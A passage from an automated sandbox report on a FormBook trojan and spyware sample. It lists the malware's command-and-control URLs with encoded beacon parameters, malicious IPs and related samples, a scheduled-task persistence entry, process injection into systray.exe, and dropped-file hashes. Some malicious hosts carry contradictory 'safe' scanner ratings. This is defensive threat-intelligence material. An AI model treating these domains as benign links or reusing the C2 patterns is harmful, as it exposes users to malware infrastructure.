                                      http://www.holytur.net/cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-2false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.nieuws-july202488.sbs/30le/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.duskgazes.work/zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lovel.shop/rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.losmason.shop/s15n/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lovel.shop/rxts/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.nieuws-july202488.sbs/30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-2true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.duskgazes.work/zs4o/true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabsystray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refersystray.exe, 00000017.00000002.2512922275.0000000005DA6000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.0000000002E16000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsystray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZMsystray.exe, 00000017.00000002.2512922275.00000000060CA000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000313A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.duskgazes.workISaSZznjXcpoJ.exe, 00000018.00000002.2513591894.0000000004D2C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namen2pGr8w21V.exe, 00000000.00000002.1373842326.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, uEugNEto.exe, 00000011.00000002.1522692999.00000000030C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0n2pGr8w21V.exe, uEugNEto.exe.0.drfalse
                                                          		high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            162.0.215.33
                                                            		nieuws-july202488.sbsCanada
                                                            		35893ACPCAtrue
                                                            104.18.73.116
                                                            		www.losmason.shopUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            15.197.148.33
                                                            		duskgazes.workUnited States
                                                            		7430TANDEMUStrue
                                                            13.248.169.48
                                                            		www.lovel.shopUnited States
                                                            		16509AMAZON-02UStrue
                                                            192.185.147.100
                                                            		hayaniya.orgUnited States
                                                            		26337OIS1UStrue
                                                            185.106.208.3
                                                            		holytur.netTurkey
                                                            		42846GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTRfalse

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1588691
                                                            Start date and time:2025-01-11 04:15:04 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 52s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:28
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:n2pGr8w21V.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@23/16@7/6
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 98%
                                                            • Number of executed functions: 90
                                                            • Number of non-executed functions: 288
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 52.149.20.212
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: n2pGr8w21V.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            04:16:09Task SchedulerRun new task: uEugNEto path: C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            22:16:00API Interceptor1x Sleep call for process: n2pGr8w21V.exe modified
                                                            22:16:07API Interceptor49x Sleep call for process: powershell.exe modified
                                                            22:16:12API Interceptor1x Sleep call for process: uEugNEto.exe modified
                                                            23:59:14API Interceptor1758467x Sleep call for process: systray.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            162.0.215.33MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                            • www.nieuws-july202488.sbs/30le/
                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.nieuws-july202488.sbs/30le/
                                                            dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                            • www.nieuws-july202541.sbs/0bvv/
                                                            QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                            • www.nieuws-july202491.sbs/4bpc/
                                                            r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • www.nieuws-july202491.sbs/rq5n/
                                                            rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                            • www.nieuws-july202491.sbs/rq5n/
                                                            z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                            • www.nieuws-july202491.sbs/rq5n/
                                                            104.18.73.116MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                            • www.losmason.shop/s15n/
                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.losmason.shop/s15n/
                                                            santi.exeGet hashmaliciousFormBookBrowse
                                                            • www.losmason.shop/uktz/
                                                            http://www.toolfriendonline.comGet hashmaliciousUnknownBrowse
                                                            • www.toolfriendonline.com/
                                                            http://nigoovip.comGet hashmaliciousUnknownBrowse
                                                            • nigoovip.com/
                                                            15.197.148.33PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                            • www.outandaboutatlanta.net/kr0d/
                                                            RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                            • www.micrhyms.info/uao9/
                                                            0CkEHZjZgO.vbsGet hashmaliciousFormBookBrowse
                                                            • www.myjiorooms.services/fksk/
                                                            RFQ.docxGet hashmaliciousFormBookBrowse
                                                            • www.maryneedskidneys.info/tqdg/
                                                            SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                            • www.energyparks.net/k47i/
                                                            p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                            • www.hyman.life/7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8
                                                            Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • www.ninesquare.games/42mc/
                                                            IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                            • www.jilifish.win/to3j/
                                                            ekte.exeGet hashmaliciousFormBookBrowse
                                                            • www.childlesscatlady.today/0l08/
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • www.jilifish.win/to3j/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.losmason.shopMN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                            • 104.18.73.116
                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 104.18.73.116
                                                            santi.exeGet hashmaliciousFormBookBrowse
                                                            • 104.18.73.116
                                                            www.zrinorem-srumimit.sbsMN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.38.113
                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 172.67.222.69
                                                            www.lovel.shopMN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 13.248.169.48

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUStNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 104.21.48.1
                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 172.67.167.146
                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.64.1
                                                            https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                            • 104.17.205.31
                                                            https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
                                                            • 172.64.41.3
                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.48.1
                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.48.1
                                                            AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.3
                                                            ACPCA5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                            • 162.0.215.91
                                                            gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                            • 162.0.213.94
                                                            http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3DGet hashmaliciousUnknownBrowse
                                                            • 162.0.217.138
                                                            bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                            • 162.0.213.94
                                                            armv4l.elfGet hashmaliciousUnknownBrowse
                                                            • 162.48.74.191
                                                            Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                            • 162.9.114.234
                                                            Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                            • 162.33.209.59
                                                            5.elfGet hashmaliciousUnknownBrowse
                                                            • 162.56.1.17
                                                            miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                            • 162.1.10.7
                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                            • 162.32.170.30
                                                            AMAZON-02USPGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 76.223.54.146
                                                            zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                            • 18.141.10.107
                                                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            5.elfGet hashmaliciousUnknownBrowse
                                                            • 157.175.218.227
                                                            BzK8rQh2O3.exeGet hashmaliciousFormBookBrowse
                                                            • 18.141.10.107
                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                            • 18.163.74.139
                                                            e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            TANDEMUShttp://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                            • 15.197.152.159
                                                            https://red.travelglobeimmigration.comGet hashmaliciousUnknownBrowse
                                                            • 15.197.240.20
                                                            https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                            • 15.197.193.217
                                                            http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                            • 15.197.152.159
                                                            http://www.www.cascotiaonlinemobile.com/Get hashmaliciousUnknownBrowse
                                                            • 15.197.130.221
                                                            mail (4).emlGet hashmaliciousUnknownBrowse
                                                            • 15.197.193.217
                                                            https://rebrand.ly/3d446fGet hashmaliciousHTMLPhisherBrowse
                                                            • 15.197.137.111
                                                            http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                                            • 15.197.236.169
                                                            rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                            • 15.197.240.20
                                                            https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                            • 15.197.152.159

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\n2pGr8w21V.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uEugNEto.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.379633281639906
                                                            Encrypted:false
                                                            SSDEEP:48:BWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:BLHxvCsIfA2KRHmOugw1s
                                                            MD5:707D84D53930CEF35303F95757D41DFD
                                                            SHA1:493518B676BEF7A575CC7F9AD46B2AA874FE0128
                                                            SHA-256:C7D5489CB7AEFE8BD66DBE86814498EBF4721C28B6E01AE93D2633E9FF127C65
                                                            SHA-512:B9DB31F55B1017E2B266124D1FB33A087642F0579952A9761B84EC6644A094BA150D78B2CE15A1821655283E308AF0FEB9CCEBCCA145F38F4926D075A7531F0D
                                                            Malicious:false
                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                            C:\Users\user\AppData\Local\Temp\H846yjBj

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\systray.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:modified
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1215420383712111
                                                            Encrypted:false
                                                            SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                            MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                            SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                            SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                            SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qhyzcm1.5l3.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wnwjmmj.lgw.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4ms4svp.ge1.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
